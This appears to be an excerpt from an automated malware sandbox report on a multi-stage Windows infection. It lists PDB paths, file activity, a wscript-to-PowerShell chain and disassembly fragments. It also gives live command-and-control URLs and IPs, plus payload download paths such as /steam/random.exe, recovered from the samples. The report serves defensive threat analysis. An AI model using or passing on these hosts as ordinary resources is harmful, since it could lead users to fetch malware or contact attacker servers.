Source:	Binary string: Bedroom.pdbH^ source: e2b0a87ceb.exe, 00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wextract.pdbGCTL source: dDFw6mJ.exe, 00000032.00000000.2785734747.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp, dDFw6mJ.exe, 00000032.00000002.2996317054.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: vdr1.pdb source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb%* source: 5a4a47dccd.exe, 00000021.00000002.2561414607.0000000000410000.00000040.00000001.01000000.00000014.sdmp, 5a4a47dccd.exe, 00000021.00000003.2468246941.00000000047EF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5a4a47dccd.exe, 00000021.00000002.2658338483.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5a4a47dccd.exe, 00000021.00000002.2598016348.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000002.3026402216.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3102238334.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5a4a47dccd.exe, 00000021.00000002.2658338483.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbu\ source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Bedroom.pdb source: e2b0a87ceb.exe, 00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_00406301 FindFirstFileW,FindClose,		9_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		9_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\764661
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\764661\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ebx, ecx	23_2_0040F060
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]	23_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov edx, ecx	23_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then push esi	23_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then jmp eax	23_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp word ptr [esi+eax], 0000h	23_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov eax, ebx	23_2_0040FB9E
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	23_2_0040F4DA
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ecx, eax	23_2_00443EA7
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov word ptr [ecx], dx	23_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3D954FEDh]	23_2_0040CFD3
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov byte ptr [ebx], cl	23_2_00431800
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	23_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, eax	23_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	23_2_0043314D
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov word ptr [ebx], cx	23_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	23_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ecx, eax	23_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]	23_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	23_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then push eax	23_2_004431FF
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	23_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	23_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	23_2_00430A40
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	23_2_0043B250
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov byte ptr [edi], al	23_2_0041FA3E
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+759F8BA2h]	23_2_00444280
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	23_2_004330DC
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	23_2_00420AB0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	23_2_00423340
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	23_2_00418B60
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh	23_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+0C61266Ch]	23_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ecx, eax	23_2_0041F3C0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then push esi	23_2_0042B3D3
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+06h]	23_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ecx, eax	23_2_0040DB91
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2F3FA6E8h]	23_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h	23_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, ecx	23_2_0041BC47
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, ecx	23_2_0041A733
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	23_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then jmp eax	23_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], E40A7173h	23_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov byte ptr [edx], bl	23_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, ecx	23_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-07h]	23_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ecx, eax	23_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov word ptr [edi], ax	23_2_0040FD7A
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, eax	23_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+02h]	23_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	23_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1D78B1A5h]	23_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], B130B035h	23_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then dec ebx	23_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E389C079h	23_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4802CC78h	23_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+04h]	23_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, ecx	23_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov edi, ecx	23_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov word ptr [ecx], bp	23_2_00420F54
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx]	23_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov word ptr [ecx], bp	23_2_00420F67
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov byte ptr [ebx], cl	23_2_00431703
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	23_2_00430F10
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	23_2_0042F7E0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then mov esi, ecx	23_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	23_2_00402780
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000EFh]	23_2_0041BF8A

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: cozyhomevpibes.cyou
Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199824159981
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: unknown

Network traffic detected: IP country count 10

Source: ae70ca0159.exe, 00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000002A.00000002.2868868289.000000000188D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/6n
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/T
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/b67ac065cc
Source: ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000002A.00000002.2868868289.000000000188D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php&
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php.
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/J
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/aCV
Source: ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php2
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php7
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000188D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php=
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpF
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000188D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpI
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpL
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpRu
Source: ae70ca0159.exe, 00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phph
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000188D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpm
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpp3
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpzu
Source: ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php~
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/icies
Source: ae70ca0159.exe, 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/icrosoft
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/nC_
Source: ae70ca0159.exe, 0000001F.00000002.2552036378.000000000198D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/ocal
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/ta
Source: ae70ca0159.exe, 00000008.00000002.2337888063.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/ws
Source: ae70ca0159.exe, 00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.1152
Source: PAL947G2R107U02V5ZPL.exe, 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115w
Source: dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Z
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/d
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: dfd80aba08.exe, 00000007.00000003.2548511018.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.execd
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeg
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exen
Source: dfd80aba08.exe, 00000007.00000003.2533046237.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2542422484.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/steam/random.exe
Source: skotes.exe, 00000006.00000003.2441786196.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000027.00000002.3100516682.00000000075D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: dfd80aba08.exe, 00000007.00000003.2309727242.0000000005CBF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2707849869.000000000592E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2855484670.000000000549A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 00000006.00000003.2441476016.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
